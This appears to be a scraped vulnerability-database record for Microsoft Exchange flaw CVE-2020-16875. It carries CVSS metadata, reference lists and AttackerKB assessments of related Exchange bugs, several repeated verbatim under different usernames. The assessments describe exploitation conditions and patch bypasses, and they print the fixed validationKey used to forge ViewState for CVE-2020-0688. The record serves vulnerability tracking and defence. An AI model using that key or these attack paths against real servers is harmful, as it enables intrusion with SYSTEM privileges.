CVE-2020-16875

2020-09-11T00:00:00

Description

A remote code execution vulnerability exists in Microsoft Exchange server due to improper validation of cmdlet arguments. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user, aka ‘Microsoft Exchange Server Remote Code Execution Vulnerability’. **Note:** As of January 12, 2021, the patch for CVE-2020-16875 has been bypassed twice. See [CVE-2020-17132](<https://attackerkb.com/topics/sfBIO5A6Cl/cve-2020-17132#rapid7-analysis>) for details. **Recent assessments:** **ccondon-r7** at September 09, 2020 6:14pm UTC reported: There’s more info in Rapid7’s analysis [here](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?#rapid7-analysis>), but as **@tsellers-r7** and **@smcintyre-r7** pointed out privately today, need for authenticated session + exposed PowerShell endpoint + user who belongs to specific Exchange groups = less opportunity for wide-scale attacks than something like February’s Exchange vuln. I’m interested to see how [Steven Seeley’s exploit](<https://twitter.com/steventseeley/status/1303454166820556800>) works if he releases it, though. Might be cause for quick re-evaluation. Assessed Attacker Value: 5 Assessed Attacker Value: 5Assessed Attacker Value: 4

{"id": "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "vendorId": null, "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2020-16875", "description": "A remote code execution vulnerability exists in Microsoft Exchange server due to improper validation of cmdlet arguments. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user, aka \u2018Microsoft Exchange Server Remote Code Execution Vulnerability\u2019. **Note:** As of January 12, 2021, the patch for CVE-2020-16875 has been bypassed twice. See [CVE-2020-17132](<https://attackerkb.com/topics/sfBIO5A6Cl/cve-2020-17132#rapid7-analysis>) for details.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at September 09, 2020 6:14pm UTC reported:\n\nThere\u2019s more info in Rapid7\u2019s analysis [here](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?#rapid7-analysis>), but as **@tsellers-r7** and **@smcintyre-r7** pointed out privately today, need for authenticated session + exposed PowerShell endpoint + user who belongs to specific Exchange groups = less opportunity for wide-scale attacks than something like February\u2019s Exchange vuln. I\u2019m interested to see how [Steven Seeley\u2019s exploit](<https://twitter.com/steventseeley/status/1303454166820556800>) works if he releases it, though. Might be cause for quick re-evaluation.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "published": "2020-09-11T00:00:00", "modified": "2021-01-15T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.0}, "severity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, "href": "https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16875", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875", "http://packetstormsecurity.com/files/159210/Microsoft-Exchange-Server-DlpUtils-AddTenantDlpPolicy-Remote-Code-Execution.html"], "cvelist": ["CVE-2020-0688", "CVE-2020-16875", "CVE-2020-168750", "CVE-2020-17132"], "immutableFields": [], "lastseen": "2022-06-14T23:28:18", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441"]}, {"type": "attackerkb", "idList": ["AKB:3B7AE30E-7135-4027-A5DA-A88A045903F6", "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "AKB:ED05D93E-5B20-4B44-BAC8-C4CB5B46254A"]}, {"type": "avleonov", "idList": ["AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "AVLEONOV:56C5888A0A7E36482CFC39A438BADAB3", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4"]}, {"type": "canvas", "idList": ["OWA_RCE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0104", "CPAI-2020-0870"]}, {"type": "cisa", "idList": ["CISA:18E5825084F7681AD375ACB5B1270280"]}, {"type": "cve", "idList": ["CVE-2020-0688", "CVE-2020-16875", "CVE-2020-17117", "CVE-2020-17132", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17144"]}, {"type": "exploitdb", "idList": ["EDB-ID:48153", "EDB-ID:48168"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05"]}, {"type": "githubexploit", "idList": ["39732E15-7AF0-5FC2-851B-B63466C0F2F2", "796841FC-B75D-5F42-B0E7-7FF15A74E5C1", "8C937DCD-4090-5A44-9361-4D9ECF545843", "A7CA20BB-BCF9-52C0-A708-01F9ADECB1AC", "AAC2853C-A655-5E80-9262-A654102B874A", "AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "F1CA855B-967C-5A5E-9256-FDDE87702713"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hivepro", "idList": ["HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "kaspersky", "idList": ["KLA11664", "KLA11955", "KLA12022"]}, {"type": "krebs", "idList": ["KREBS:613A537780BD40A6F8E0047CE8D3E6EC", "KREBS:95DEE0244F6DE332977BB606555E5A3C", "KREBS:9D9C58DB5C5495B10D2EBDB92549B0F2", "KREBS:DF8493DA16F49CE6247436830678BA8D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_ECP_DLP_POLICY-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_ECP_VIEWSTATE-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0787_BITS_ARBITRARY_FILE_MOVE-"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0688", "MS:CVE-2020-16875", "MS:CVE-2020-17117", "MS:CVE-2020-17132", "MS:CVE-2020-17141", "MS:CVE-2020-17142", "MS:CVE-2020-17144", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065"]}, {"type": "mskb", "idList": ["KB4536987", "KB4536988", "KB4536989", "KB4571787", "KB4571788", "KB4577352", "KB4593465", "KB4593466"]}, {"type": "mssecure", "idList": ["MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "nessus", "idList": ["701277.PRM", "SMB_NT_MS20_DEC_EXCHANGE.NASL", "SMB_NT_MS20_FEB_EXCHANGE.NASL", "SMB_NT_MS20_SEP_EXCHANGE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156592", "PACKETSTORM:156620", "PACKETSTORM:158056", "PACKETSTORM:159210"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:14FD05969C722B5BF3DBBF48ED6DA9C0", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:69F5E155188CF28043839A251912213A", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:D6BB8795D96ECAD5C95596F19210BB13", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:8F65784C67333FC453D98DBB9FBEBA4C", "RAPID7BLOG:99D9180FBF3F900ADB0CDC5EF79EC080", "RAPID7BLOG:CBD7A5DA1DAAE9DCFD01F104F4B1B5FB", "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85"]}, {"type": "securelist", "idList": ["SECURELIST:67C82A057DBE22C60DC2677D52D52ECD", "SECURELIST:91CACDF02C22F17E70A0DC58D036F9DE", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:F05591B26EFD622E6C72E180A7A47154"]}, {"type": "srcincite", "idList": ["SRC-2020-0019", "SRC-2020-0032", "SRC-2020-0033"]}, {"type": "talosblog", "idList": ["TALOSBLOG:EA0E0FACD93EAC05E55A6C64CC82F3F6"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "thn", "idList": ["THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "THN:8D0E2C792A85A3FB8EC6A823D487FAE6", "THN:9B536B531E6948881A29BEC793495D1E", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BCD236457064C9D8673B1536BE370718", "THN:CDB4261BBCF3D5E2CC872D65E155CC0E"]}, {"type": "threatpost", "idList": ["THREATPOST:02914A68EEB34D94544D5D00BF463BAC", "THREATPOST:06C5D9E6950186757AA989F2557336B3", "THREATPOST:142DAF150C2BF9EB70ECE95F46939532", "THREATPOST:1925DCFAF239C5B25D21852DB978E8E9", "THREATPOST:21FB6EBE566C5183C8FD9BDA28A56418", "THREATPOST:22663CEB225A1F7F9DD4EBD8B84956C1", "THREATPOST:24AD38597408C4E7757770D45345AEBA", "THREATPOST:2BDC072802830F0CC831DE4C4F1FA580", "THREATPOST:33026719684C7CD1B70B04B1CFFE2AEB", "THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:3E89058B621DF5B431A387D18E4F398C", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55", "THREATPOST:4D0DF8055D2BC682608C1A746606A6E4", "THREATPOST:4DD624E32718A8990263A37199EEBD02", "THREATPOST:4F1C35A7D4BE774DF9C88794C793181D", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "THREATPOST:6EA5AB7FCD767A01EA56D7EEF6DA0B0A", "THREATPOST:7BCCC5B4AA7FB7724466FFAB585EC55D", "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "THREATPOST:985BD7D2744A9AA9EC43C5DDCD561812", "THREATPOST:99AD02BEC4B8423B8E050E0A4E9C4DEB", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B047BB0FECBD43E30365375959B09B04", "THREATPOST:B25070E6CF075EEA6B20C4D8D25ADBE8", "THREATPOST:BD8DD789987BFB9BE93AA8FD73E98B40", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:EA093948BFD7033F5C9DB5B3199BEED4", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20"]}, {"type": "zdi", "idList": ["ZDI-20-258"]}, {"type": "zdt", "idList": ["1337DAY-ID-34037", "1337DAY-ID-34051", "1337DAY-ID-34553", "1337DAY-ID-34947"]}]}, "score": {"value": 1.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441"]}, {"type": "attackerkb", "idList": ["AKB:3B7AE30E-7135-4027-A5DA-A88A045903F6", "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B"]}, {"type": "avleonov", "idList": ["AVLEONOV:56C5888A0A7E36482CFC39A438BADAB3", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4"]}, {"type": "canvas", "idList": ["OWA_RCE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0104", "CPAI-2020-0870"]}, {"type": "cisa", "idList": ["CISA:18E5825084F7681AD375ACB5B1270280"]}, {"type": "cve", "idList": ["CVE-2020-0688", "CVE-2020-17132"]}, {"type": "exploitdb", "idList": ["EDB-ID:48153", "EDB-ID:48168"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05"]}, {"type": "githubexploit", "idList": ["39732E15-7AF0-5FC2-851B-B63466C0F2F2", "796841FC-B75D-5F42-B0E7-7FF15A74E5C1", "8C937DCD-4090-5A44-9361-4D9ECF545843", "A7CA20BB-BCF9-52C0-A708-01F9ADECB1AC", "AAC2853C-A655-5E80-9262-A654102B874A", "AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "F1CA855B-967C-5A5E-9256-FDDE87702713"]}, {"type": "hivepro", "idList": ["HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "kaspersky", "idList": ["KLA11664"]}, {"type": "krebs", "idList": ["KREBS:613A537780BD40A6F8E0047CE8D3E6EC", "KREBS:95DEE0244F6DE332977BB606555E5A3C", "KREBS:9D9C58DB5C5495B10D2EBDB92549B0F2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_ECP_VIEWSTATE"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0688", "MS:CVE-2020-17132"]}, {"type": "mskb", "idList": ["KB4571787"]}, {"type": "mssecure", "idList": ["MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_DEC_EXCHANGE.NASL", "SMB_NT_MS20_FEB_EXCHANGE.NASL", "SMB_NT_MS20_SEP_EXCHANGE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156592", "PACKETSTORM:156620", "PACKETSTORM:158056"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:14FD05969C722B5BF3DBBF48ED6DA9C0", "QUALYSBLOG:D6BB8795D96ECAD5C95596F19210BB13"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:99D9180FBF3F900ADB0CDC5EF79EC080", "RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85"]}, {"type": "securelist", "idList": ["SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": "srcincite", "idList": ["SRC-2020-0019", "SRC-2020-0032"]}, {"type": "talosblog", "idList": ["TALOSBLOG:EA0E0FACD93EAC05E55A6C64CC82F3F6"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "thn", "idList": ["THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "THN:BCD236457064C9D8673B1536BE370718", "THN:CDB4261BBCF3D5E2CC872D65E155CC0E"]}, {"type": "threatpost", "idList": ["THREATPOST:02914A68EEB34D94544D5D00BF463BAC", "THREATPOST:06C5D9E6950186757AA989F2557336B3", "THREATPOST:142DAF150C2BF9EB70ECE95F46939532", "THREATPOST:1925DCFAF239C5B25D21852DB978E8E9", "THREATPOST:21FB6EBE566C5183C8FD9BDA28A56418", "THREATPOST:22663CEB225A1F7F9DD4EBD8B84956C1", "THREATPOST:24AD38597408C4E7757770D45345AEBA", "THREATPOST:2BDC072802830F0CC831DE4C4F1FA580", "THREATPOST:33026719684C7CD1B70B04B1CFFE2AEB", "THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:3E89058B621DF5B431A387D18E4F398C", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55", "THREATPOST:4DD624E32718A8990263A37199EEBD02", "THREATPOST:4F1C35A7D4BE774DF9C88794C793181D", "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "THREATPOST:7BCCC5B4AA7FB7724466FFAB585EC55D", "THREATPOST:985BD7D2744A9AA9EC43C5DDCD561812", "THREATPOST:B047BB0FECBD43E30365375959B09B04", "THREATPOST:BD8DD789987BFB9BE93AA8FD73E98B40", "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20"]}, {"type": "zdi", "idList": ["ZDI-20-258"]}, {"type": "zdt", "idList": ["1337DAY-ID-34037", "1337DAY-ID-34051"]}]}, "exploitation": null, "vulnersScore": 1.8}, "_state": {"wildexploited": 0, "dependencies": 1659994789, "score": 1659887192}, "_internal": {"wildexploited_cvelist": null, "score_hash": "8509c546122f471a8152b1d2e5dbfff6"}, "attackerkb": {"attackerValue": 5, "exploitability": 4}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "published": "2022-06-14T21:35:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16875"], "Miscellaneous": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875", "http://packetstormsecurity.com/files/159210/Microsoft-Exchange-Server-DlpUtils-AddTenantDlpPolicy-Remote-Code-Execution.html"]}, "tags": ["common_enterprise", "post_auth"], "mitre_vector": {}, "last_activity": "2022-06-14T21:35:00"}

{"attackerkb": [{"lastseen": "2021-10-04T22:44:18", "description": "Aka \u2018Microsoft Exchange Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-17117, CVE-2020-17141, CVE-2020-17142, CVE-2020-17144.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at January 12, 2021 7:07pm UTC reported:\n\nThis is vulnerability is a bypass for the patch issued for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875>). The vulnerability was also identified and analyzed by Steven Seeley. The patch can be bypassed using call operators as described in Seeley\u2019s blog [Making Clouds Rain RCE in Office 365](<https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html>).\n\nThe original vulnerability is a command injection vulnerability that results in OS commands being executed with SYSTEM level privileges on the Exchange server due to insufficient sanitization on a cmdlet invocation.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-12-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-17132", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-16875", "CVE-2020-17117", "CVE-2020-17132", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17144"], "modified": "2021-01-15T00:00:00", "id": "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "href": "https://attackerkb.com/topics/sfBIO5A6Cl/cve-2020-17132/rapid7-analysis", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-10-22T16:51:11", "description": "Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-1730.\n\n \n**Recent assessments:** \n \n**bwatters-r7** at March 03, 2021 1:51pm UTC reported:\n\nThis attack is super useful to gain privileged access to an Exchange server. Given the ubiquity of the target, it\u2019s remote nature, the presence of a simple python PoC, and the benefits from gaining privileged access to a mail server, hackers will be reaching for this exploit frequently, even if it does require authentication. \nFurther complicating matters is that the requests themselves are through https, so standard deployment for NIDS likely will not catch the attack. If you\u2019ve added certificates to your NIDS to decrypt traffic, then it might catch the attack, but that scenario is not particularly common, especially in small to midsize organizations. \nPatching is the primary method for mitigating this attack, though the logs left afterward (if they are not destroyed) are straightforward and reviewed in the technical analysis here: <https://attackerkb.com/topics/taeSMPFD8J/cve-2021-24085?#rapid7-analysis>\n\n**NinjaOperator** at June 23, 2021 11:46pm UTC reported:\n\nThis attack is super useful to gain privileged access to an Exchange server. Given the ubiquity of the target, it\u2019s remote nature, the presence of a simple python PoC, and the benefits from gaining privileged access to a mail server, hackers will be reaching for this exploit frequently, even if it does require authentication. \nFurther complicating matters is that the requests themselves are through https, so standard deployment for NIDS likely will not catch the attack. If you\u2019ve added certificates to your NIDS to decrypt traffic, then it might catch the attack, but that scenario is not particularly common, especially in small to midsize organizations. \nPatching is the primary method for mitigating this attack, though the logs left afterward (if they are not destroyed) are straightforward and reviewed in the technical analysis here: <https://attackerkb.com/topics/taeSMPFD8J/cve-2021-24085?#rapid7-analysis>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T00:00:00", "type": "attackerkb", "title": "CVE-2021-24085", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-16875", "CVE-2020-24085", "CVE-2021-1730", "CVE-2021-24085"], "modified": "2021-03-05T00:00:00", "id": "AKB:ED05D93E-5B20-4B44-BAC8-C4CB5B46254A", "href": "https://attackerkb.com/topics/taeSMPFD8J/cve-2021-24085/rapid7-analysis", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T18:09:55", "description": "A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka \u2018Microsoft Exchange Memory Corruption Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at February 26, 2020 5:02pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\n**hartescout** at February 26, 2020 2:30am UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\n**J3rryBl4nks** at March 02, 2020 10:11pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\n**theguly** at February 28, 2020 4:45pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\n**xFreed0m** at March 10, 2020 2:34pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write 